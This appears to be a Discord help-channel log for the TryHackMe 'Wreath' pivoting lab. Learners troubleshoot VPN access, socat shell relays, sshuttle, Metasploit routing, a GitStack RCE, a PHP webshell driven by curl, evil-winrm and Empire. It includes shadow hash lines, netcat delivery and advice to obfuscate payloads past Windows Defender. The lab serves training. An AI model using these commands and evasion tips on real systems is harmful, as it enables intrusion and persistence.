if somebody knows what i might be doing wrong pls help

i think my binary on the compromised machine isnt working properly

how do i fix that?

i ran it without the ./ and it doesnt recognize it as a command/script

It should be .\program-name.exe

If that still doesn’t work, verify the location of the executable and that you’re calling it from the right place and/or you picked the correct release from the GitHub

it still doesnt work

and its from the right place

wait

i am using the linux binary on windows fuck

That'll do it

can not access wreath machine. I am subscriber of try hack me.this room not showing any network state.can you help me

for subscriber also do we need 7 days streak?

please help me.

Hi here, if someone can help me for this room. I have a problem for the root user's hash in the enumeration at beginning... it's not the same. what can I do? taking the old one?

root user password hash showing error after putting

root:$6$hlOGzVl7VI17Ij8Y$bvLi6CRKA/MWT8Wbnr9RxsgTD4wXm76nCX01vZu/VP0qb4ceFng.pakE6KybHOw8jLF8HO8yBu09BnzWdj/yn1:18870:0:99999:7:::

$6$hlOGzVl7VI17Ij8Y$bvLi6CRKA/MWT8Wbnr9RxsgTD4wXm76nCX01vZu/VP0qb4ceFng.pakE6KybHOw8jLF8HO8yBu09BnzWdj/yn1 , but I put this one

showing error

please helpme

yes its the sam for me @rustic smelt

I think the root hash has been changed

What is the IP address @surreal sail, @rustic smelt?

10.200.196.200 for me @merry robin

same

10.200.196.200

Cool. Could one of you disconnect and DM me your .ovpn pack please 🙂

yep if you want

falcon-wreath.ovpn : @rustic smelt

That should be fixed now 🙂

okay let me check

How do I make sure the network is running? I ping to if after running the open VPN and get nothing from my Kali box ?

I didn’t see this picture up top

is it a way to redirect from victims web-site to my
or how is it used in real life ?

It's used in real life just as it's used in the room

i don't get, why they froward like this

my reverse shell doesn't work. I've added the port to the public firewall rules followed the tutorial, if anyone could help me. DM me, that would be appreciated.

restarted the server and now it works 😄

cant ping to public facing IP address..

host unreachable and vote is not working.. 😦

just gonna watch the walkthrough then...

its reachable again

Nice room thanks for making it 🙂

Most compagnies have an private website that is only accesable via lan and not via wan. If you want to hack the private lan website you need to access it somehow. That's why you need to portforwarding

Tech, can you please check the wreath network, even subs users can't reach the network

how easy is it to notice me in network, when im connected with sshuttle?

Quite, given there's SSH traffic in/out of the network to your system

did anyone manage to do wreath only using metasploit?

Should be possible I think...

yeh I thought so too, but I'm having trouble catching a shell in metasploit from the gitstack machine

What are you using for pivoting?

so the webmin vuln you can exploit via metasploit to get a meterpreter shell on the public web server, then to exploit the gitstack one you can set the lhost to this public web server (metasploit understands it has to route through the established meterpreter session)

don't you have to set autoroute first?

sure

Did you?

yep

okay...

and what happens?

I just don't seem to hit the exploit/multi/handler listener

for the record, I've also done the entire room in the intended way, and that all worked fine

You might have to set up a proxy server and tunnel through it

but the gitstack machine should be able to reach the public web server, this is also what is used in the powershell command

I think you do need a proxy server along with autoroute

try use socks_proxy

If there is someone who knows better, please correct me

then use gitstack_rce with set Proxies socks5:127.0.0.1:1080

did you successfully use gitstack_rce? That module gave me maximum length errors with every payload I tried

I went the manual route and then tried to upgrade to a meterpreter shell from the powershell method detailed in the notes (but cannot manage to catch a shell in multi handler like I said)

I will try. I haven't tried with metasploit.

Wait so the reverse shell doesn't get to you?

I can catch it the intended way with nc (so like in the notes), but when I then try to upgrade to a meterpreter reverse shell I cannot catch it with exploit/multi/handler

which is why I'm so confused

I first tried getting a meterpreter shell in one go from gitstack_rce but that just kept failing me

That is weird...

yeh ... if you feel like giving it a go I'd be interested to see what you come up with

I will try and get back to you

👍

Going through the code, it seems that the maximum payload size is 6110 bits. So most payloads exceed this limit. That's why we get the error

I'm going through Wreath and I'm trying to use socat to forward the traffic on my compromised machine (port: 16160) to my kali machine (port: 17000) so that I can catch the shell from the 2nd windows machine, but socat just hangs and nothing happens in my listener. Any idea on what I'm doing wrong here? I have my Kali netcat listening on 1700

./socat tco-1:16160 tcp:10.50.151.9:17000 &

I get unexected token 'newline' line7 '<!DOCTYPE html>'

shouldn't netcat be listening on 17000 not 1700?

This should be ./socat tcp-l:16160 tcp:10.50.151.9:17000 &

You had tco instead of tcp and 1 instead of l

That is a L not a 1. (Should be lowercase. I put uppercase for clarity)

You downloaded the webpage, not the binary

omg lol that's probably the problem

That too. But how didi you manage that 😅.

Mistake the webpage for binary I mean. I didn't pay attention to the error output after I noticed the syntax error. My bad. But yes. <!DOCTYPE html> would suggest that you are trying to execute a webpage...

It's quite common when downloading stuff from Github. People don't realise that you need to explicitly use the raw link rather than the link to the file

Ah I see. Thanks Muiri

Gave +1 Rep to @merry robin

I'm honestly not even sure 🤣 . I'm trying to relay the shell we run via Burpsuite for the Gitserver through the compromised machine and into my Kali machine so I can access the windows machine in a Kali terminal. Maybe I'm misunderstanding how to use socat 🤔

Is it working now?

I'll let you know in about an hour. I plan on trying again on my lunch break

It's 9 pm over here lol

Anyone get username for the github clone?

Sorry? Didn't understand

Hi

My exploit for gitstack is not working, giving me the error “no module name request”

Need help please

Pls dm

try to create a env on python2 and install the module requests

pip install requests i think it was

and don't run it with sudo. A lot of people run pip with sudo

Thanks man this worked
Python2 was creating error

Gave +1 Rep to @cedar ferry

You have -ssh-cmd. You want --ssh-cmd

Pretty sure you also want the exclude

thanks)

hmm, doesnt it have to allow me to interact with host 100?

I don't know what you mean.

Why would it not?

i used sshuttle to connect to that network and access 100 host
but i cant (

If you read on the room page, you will find that machine with .100 is wreath-pc and is not public facing and also not accessible to the first machine .200 (prod-serv)
Good luck👍 🙂

And the room will help you by providing various methods and tools to get you to the final machine wreath-pc from prod-serv (public facing) through .150 git-serv (accessible to .200)

I think someone deleted the ||îd_rsa|| of my wreath instance... What should I do?

Are you able to connect to the machine (the first one, prod-serv)?

If you think, there is some issue.
Try appending your own public key into ~/.ssh/authorized_keys and have fun with this room🙂

why isnt it working?(
task 20

hello i have a problem with ssh connection to centos machine with ip 10.200.185.200

what is the problem?

@twin tide when i scan the first ip with nmap by command (nmap -p 1-15000 10.200.185.200) i found that ssh port is not opened its filtered

@oblique crag

@limber rover

You aren't supposed to ping them for this

This is honetly hilarius

something new

Cannot add user to repository is normal

A 500 response... is not

Maybe try for a reset

its a reason of "Cannot add user to repository"
just added print for responce

What command do you have it running?

what command do you mean?

In the script

What is the command that it is running?

this part

Nope. The bit at the very top

"whoami"

i didnt change it

Hm. Go for a reset

did)

thanks anyway

Wait 5 to 10 mins after starting the network

still filtered

can anyone vote for reset? only one vote is required.

Anyone else lost connectivity towards prod-serv?

Network state: Running : Network up time: 10min

Yeah, lost it too for a sec

sshuttle is up agin for me

had to reconnect

Hello everyone. Can you help me with something please?

Thank you for replying, ok I am on part 6 of this, downloaded the CVE, run the shell, but never see it's working just says listening and nothing happens. What am I doing wrong please

You'll probably have to change the CVE to match your listening port

So run the CVE using the tun0 IP instead of the THM IP?

Nano or Vim the CVE and take a look

Thanks will try that now

Good luck!

Will need a miracle 😂

Nah. Let me know how it goes

So with the code it goes as it states

"shell"

Types IP (first the THM one then read on Dark's video comments the tun0 one)

Types a port number either something with 7 or 1337

Shell side works NETCAT doesn't do anything.

Got screenshots if it helps

Can you share the CVE config?

It's default. Just ran it with the THM IP

Were you able to get it to work?

My Website.git download is succesful within 5 seconds, but I cant find the dir on my Kali pc.... tried without a destination and with a destination. nothing...

anyone a clue?

(Download from Evil-WinRM)

Got frustrated so turned my laptop off and watched LOTR 😎

😆

any one got this error while executing empire client [!] Error: <urllib3.connection.HTTPSConnection object at 0x7f0c74896f40>: Failed to establish a new connection: [Errno 111] Connection refused

empire server is running in background

I had this same issue. Used another way to get the files. PM for more detail

When doing the clean up, how do you delete the nc binary? I get access denied as system. Guessing because on using it for my shell.

With difficulty. In a situation like that (which would be rare as there would usually be a C2 in the mix) you might consider alerting the point of contact with the company and telling them to remove it.

Okay, thanks! And for the sake of the Room, just let i be?

Gave +1 Rep to @merry robin

Yeah, it will get cleared up on reset anyway

👍

Thanks

I get triggered about download not just working.... need to find out why 😫 If you just tell me the protocol you used I will figure the rest out

DM

why would the shell not work properly? Does it run on my IP or the THM IP? And what else am I doing wrong? I can include pictures

Here's the screenshots

Basically it's not listening to the port on NC

Dude take actual screenshots. Those are just annoying to look at!

You have too much tun interfaces. Kill some

sudo pkill openvpn will probably do it. Then reconnect to wreath

Not connected to discord on PC and will try that now

Although it's running the wreath network ovpn file

Yeah, but several times.

!vpnscript

FFS so I do what the fellow suggested? Kill the process and run it again?

Read somewhere that the 10.50.. Would run the shell is that correct?

It worked!

Thank you for your help everyone. Been at a stump for 3 days 😂

Hi, I can't access the first machine. There are already 3 that we send to reset, we just have to wait? I have my vpn connection all correct.

Are you on the wreath VPN or the THM VPN?

wreath vpn

How are you checking your connection?

ifconfig (?

and send ping to the victim

I can't connect either

1st test is Wreath, 2nd EU-VIP-2

I have the same problem haha

I don't think the script will deal with Network VPN packs. Can't remember what octets I put into it

I thought you made it deal with that

I can't remember 🤷‍♂️

@upbeat umbra @median mauve Show the output in your terminal when you try to connect please

Well, it will definitely fail if you have both active at once, and it will also fail at the ping 10.10.10.10 check

Which is where it was failing in those screenshots

@merry robin I was not connected to both networks at the same time

@strange bison

I also can't ping 10.10.10.10 on the wreath network. VPN connects fine, only one instance running.

screenshots

Does the network reset after it expires, or does it just pause and come back on when we click start? Does it depend on how many people asked for a reset, or do you absolutely need 8/8? (does that ever happen?)

10.10.10.10 isn't on the wreath network

It just pauses

And there's more than 8 people on the network, it's a proportion of the total users in the network

Oh that makes sense!

Just FYI, the !vpnscript tries to ping 10.10.10.10 which got me confused. The network seems to be back to normal now.

Still can't reach the first box.. "no route to host"

but there is

Anyone else having trouble running the exploit against the 2nd box?

Are you using curl? Took me a while to figure it out because I was trying to put the payload inside the Python script.

I was trying to use curl, yes. I had successfully used curl a couple of days ago to ping a host but just now it was returning:
<b>Notice</b>: Undefined index: a in <b>C:\GitStack\gitphp\CrymynylMynd-exploit.php</b> on line <b>1</b><br />
<br />
<b>Warning</b>: system(): Cannot execute a blank command in <b>C:\GitStack\gitphp\CrymynylMynd-exploit.php</b> on line <b>1</b><br />

However, now I am unable to connect to anything

I saw there were 3 requests to Reset so I'm assuming someone has borked something

You need to post with -d "a=[command]"

Yeah, I did that. I just repeated the same command that succeeded the other day

It was in my history

Can you paste your curl command?

Sure. For example:

curl -X POST http://gitserver.thm/web/CrymynylMynd-exploit.php -d "a=ping -n 3 10.50.182.76"

Have you tried url encoding it?

Actually, I'm now getting no route to host, same as the user above

Sorry, I'm not sure what you mean about URL encoding it

so convert the spaces to %xx or whatever

https://www.urlencoder.org/

Yes

ah ok

so should anything that isn't a letter or number be URL encoded?

Btw, the .150 box won't see your own machine, only the .200

i.e. every " ","-","=","." needs to be encoded?

Yeah, I noticed that

and .200 doesn't respond to ping

Use an encoder like I linked. It's simpler than converting yourself

so I think maybe ping was working but now I'm getting no route to host so more serious problem I guess

thanks for the line @manic parrot

Gave +1 Rep to @manic parrot

link i mean

It can't just be Wizzy and I, surely? Are you guys able to reach .200 still?

I was having issues earlier, and then it worked. Not sure right now, I'm not at my pc

Ah OK. I'll reboot, ya never know... Failing that I suppose we just wait for another 4 users to request a reset?

But you can use the PHP exploit which means your tunneling from 200 somehow?

I could earlier but I've not been able to reach anything for a while now

sshuttle crapped out too

Ah

Can't reconnect

VPN is up though. Got an IP etc

Ha! Rebooted and I can reach .200 again. Who would have thunk ir

it

Curl works fine now. Thanks guys

Weird

yeah, it looks like .200 was reset, but not .150

I had some files on both, and I lost the ones on .200

Connect to what? You'll need to provide more detail..

please give context and details

Lil confused about the evil-winrm bit. I used sshuttle to connect to git-serv and it sounds like I'm supposed to run win-rm on my local machine which has no direct connection to .150

what have I missed?

sorry, git-serv is .150, I meant I used sshuttle to connect to .200

sshuttle makes a connection to .150 through 200. kind of like a vpn.

So I should be able to reach .150 from my local machine?

I'm not sure where I've gone wrong then

Ah the error is AuthorizationError. I must have messed up on the password or something

Hrmm reset the password, checked the groups but still getting the same

ah jeeeeez it was the username

thanks @twin tide

Gave +1 Rep to @twin tide

1 little letter

yeah. supper annoying. takes too way too much time to catch it

My attention to detail sucks in my old age

I'm getting no output returned from modules in Empire. Anyone else had that issue?

@earnest nest Don't touch the agent script after you ran it in evil-winrm. It will kill the connection if you CTRL + C out of it. Does anyone know if you can background this?

Thanks but I don’t think I did. I get the output in reports in Starkiller but nothing returns in the CLI. Odd one

Hi

||Im not reaching /spoiler.150 Git-Serv frowning with Evil-winrm, I already tried with chisel, ssh client and sshuttle, with sshuttle I can get a connection like a VPN, but I simply cant reach the conection, even pinging, it does not have response||

It's a Windows machine -- they don't respond to ICMP echo packets

Oh, have you looked into why? It's fascinating

It's a firewall rule, although why it's there I have no idea

On normal THM networks it treats AB traffic as a different zone

That's why furthernmap is weird

Yep, the rule only applies to public networks

Anything on the same subnet is classed as being part of the same private network

Although why it assumes anything on a different subnet is public I don't know 🤷‍♂️

hi ! I'm trying do download the git file from 150 and I get a Info: Download successful! after 2sec but I can't find the file on my local computer 😦

someone knows why ?

Not sure but I would check your default download location in your browser, you might have changed it (default is /home/enelg/Download/filename.git)

Someone else would know better though

Thanks but it must be something else...

That's usually when you're trying to download it to somewhere you don't have write access

Try specifying /tmp

does still not work for me

Can you please clarify a bit more about git file?
Is it .git directory?

task 35

Use evil-winrm to download the entire directory.

From the directory above Website.git, use:
download Website.git

I get a Download successful msg but no website.git on my computer

yes the .git directory

Are you sure you can download a directory?
IIRC, I compressed it first and then downloaded the archive.
I may be wrong, gotta check the room again.

yeah and I checked the WU video and it should work. I should take like 5min but work. I will try to figure a other way to download the file

Yeah, because you mentioning 2 sec doesn't sound good to me

Pfff I needed to specify the full path to the file.... Now it works 🙂

||Ok, but Im not able to use Evil-winRM, I actually have access via remmina or xfreerdp, but evilwin does not have access to the shell, it says connection refused||

I've solve this, just change the pivot technique and it finally works

does anyone knows how to fix this?

do you guys thinks wreath is harder than holo?

Not at all

Wreath is designed to be an introduction to networks

okay

Yes

Oh, wait, harder

I thought you said "better"

Wreath is better than Holo, but it's definitely not harder

Hey guys

I can't seem to connect to the network anymore

I'm on the gitserver part so i used the network quite a lot already, came back today, fired my VPN as always and this is what i get:

ping 10.200.187.200
PING 10.200.187.200 (10.200.187.200) 56(84) bytes of data.
From 10.50.184.1 icmp_seq=1 Destination Host Unreachable
From 10.50.184.1 icmp_seq=2 Destination Host Unreachable
From 10.50.184.1 icmp_seq=3 Destination Host Unreachable

SAME!

is there an issue with the network or just me ?

I just died like 30 mins ago

ok that's kind of a relief actually 😄

i tried regenerating my openvpn config, to no avail

Guess i'll have to try tomorrow again =/, i voted for a network reset but i need 7 more votes 😅

i just bought it and its down : (

Can we contact someone from staff about that ?

@jagged plank @surreal sail what is the first IP you've been given?

10.200.187.200 is the ip of the first server (the webserver)

At least it was yesterday when i posted

@merry robin

when downloading website.git it returns "Download successful" in a few seconds but there isnt website.git on my machine

Try puttin the full path of the git folder

Guessing the network is back then

ok, will try

why is there no route to host?

A few of us have the same issue, no idea why

Seems to work for @open lava though

hmm it was working fine for me like 20 mins ago

just tried it again, still not working 😦

my 10days of free access are almost up, it's a shame

I cannot reach the machine anymore, It just disconnected me. Can someone please press the reset button?

There's a large number of wreath instances

Firstly, make sure the network is not sleeping

Secondly, if you are going to ask for a reset here then you need to specify the third octet of your network so that people on your network vote

I think you can still access it after that but you will be put in a different network

I've been doing it for more than 10 days for free

Working through Wreath but my exploit isn't working! Trying to get into the second machine through the ||GitStack|| exploit but I'm getting this error - could anyone help? 🙂

||From what I can see it seems to be doing some very weird stuff and not selecting repos but selecting files on the machine||

Don't worry, had to reset the network, now it works 🙂

@merry robin sorry if im not supposed to @ you but just wanted to thank you for the room! I completed it and learnt a lot 🙂

Gave +1 Rep to @merry robin

Glad you enjoyed it 🙂

Any body on the 10.200.87 subnet, are you able to access the room machines?

I don't know what I'm doing wrong! I'm trying to download the ||website git repo|| in task 35, and WinRM is claiming that it downloaded, but it's not appearing in any directory on my local Kali box. Any ideas?

Basically it will be in the directory that you started the Evil-rm in

I know but it's not there

I've checked and tried multiple times

that worked, thank you)

Gave +1 Rep to @jagged plank

download FULL_PATH

Had the same issue myself, a small update to the text would be good.

cc @merry robin

didnt get, why we used empire ?

Fairly certain it was just to showcase this kind of tool, we don't use it afterwards.

Hi guys, just started the wreath-network... and i'm already stuck 😐 At the beginning, well in theory not, it's Task 5, enumerate the web server... "Thomas gave us an IP to work with (shown on the Network Panel at the top of the page)." I don't see the ip there 😕

I did the script kiddie and ran nmap 10.50.185.0/24 but not sure if i'm supposed to that. Also, I could have guess it should be the 10.50.185.0.1 ip, but not sure as how realistic this network really is. I'm a bit scared to hit the neighbor eh. But at the same time, we always say, go figure it yourself or RTFM or try harder, but I don't want to get issues with the THM admin staff 😄

As a side note, on top of the page, Access Machine is in red. Usually it is green with the VPN, I'm connected and got the ip, so far so good, but maybe a hint for you guys. I'm a noob eh

So I have 3 computers on that network (4 with me). Should I not supposed to see only 1, as from what I understood, only 1 public facing. (That's why i'm asking myself on up to how realistic this network is vs real life situation). Please, don't hit me, i'm a noob and hope to understand more with following this room 😕

It is fairly realistic.
People do have test, dev and production servers
And some do keep their test and dev servers hidden from public access

Yes of course, like everyone does. A root computer or router from ISP with a few port forwarding. Here I see 3 computers.

*A router computer

BTW, 10.x.x.1 and 10.x.x.250 aren't part of the wreath network

Hum, I need to knock on the door of these other IP's then?

You will get 10.x.x.200 (public server) and using that you will get to pivot into the internal network

To be clear, it isn't Port Forwarding here.
There are legit 3 different systems, as once mentioned by Muiri which are configured at AWS side

Later in the room, you will be asked to scan for other systems with the subnet mask /24
Moreover, if you are connected to THM VPN. 10.x.x.x is allocated for it and your neighbor shouldn't be using any network there (unless they are doing the same room and sharing the wreath subnet with you 😜)

Well, I mean our neighbors here, the other THM users 😄

I'm attacking the 3rd box but can't get a shell... I think my netcat uploaded to it...

It isn't allowed unless specified in the room.
But, your neigbhors won't be sharing their systems on the wreath network
You scanned 10.50.185.0/24 which isn't wreath network but 10.200.x.x instead

Can you verify if your netcat is still there?
The Windows Defender might have quarantined it

I've tried ls'ing different dirs but nothing's showing up. whoami and systeminfo still work tho

So how are you running your netcat executable?
Don't you think if you can't ls or dir to see it, you can't run it?

What I did, was get a webshell to use it along my other shells
Because it wasn't being flagged by Windows Defender (that part is mentioned in the room as well, to obfuscate your payloads)

It doesn't seem to be in temp

I've dir'ed it now bc ls wasnt working, and temp is empty

Is that where you uploaded it?

I have the webshell, I'm just trying to get a full shell]

Yeah I curled it from a webserver on my local machine

Because ls isn't present in Command Prompt 😅

And the request went through because there was a 200 in the logs

so I don't know where it went lol

I've tried again but it's not there for some reason

You curl-ed the netcat file after hosting it on your system?

yep

and my system reported a 200 so the remote box had grabbed it

That's what I said, Windows Defender is removing it😅

but the room says it would work fine

You gotta obfuscate it

in the room Muiri doesn't obfuscate it

Yup, I got it. Just read it again.
But for me, it wasn't the case. My nc.exe was getting removed whenever I tried to ran it

IIRC, after gaining elevated privileges I got myself one RDP session and checked the Windows Defender and there were logs in it

Shall we ping Muiri to alert about the issues with nc

I don't think so.
Did you try different variants of nc, available on GitHub?

No, I used the version they told us to use in the room

Try to use some other versions as well

I think, I used nc64.exe from here
https://github.com/int0x33/nc.exe/

That's what I used, it didnt work

nc64.exe or nc.exe?

nc.exe didn't work for me either

I was going to write my own or modify the existing code for nc but nc64.exe did the job

I just finished the room, the nc64 worked for me

I couldn't compile my own, but the one provided works

@lusty saffron when you say it "doesn't work" what do you mean ?

Huh, where?

ah never mind, it's @tranquil river who's unable to use NC

sorry

Hi there
I have found this root hash || root:$6$kLp4TrZyagwh6Mjj$6005g4P4UI5p0LuYmuZu/GB9j/vMG84B5MLc6gN4JIgr8R.RLl064v5PgalNSyBvn9POJejFEzmg59K4Ui43v/:18890:0:99999:7:::||
but the asnwer format is this , and anything I input is wrong

anyone ?

should we be able to ping the first machine on wreath?

Yes, you should be able to ping the first machine (public facing server) - 10.x.x.200

yeah, I know what the IP is, I am just not able to ping it

What are you getting as the response?

Someone might have disabled ICMP echo

Yes please be more descriptive than "it doesn't work"

there's quite a few reasons why a ping would not work, what error are you getting ?

remove the root: part and anything after the last /, the password hash is only the second field, not the entire line

I have tried it, doesn't help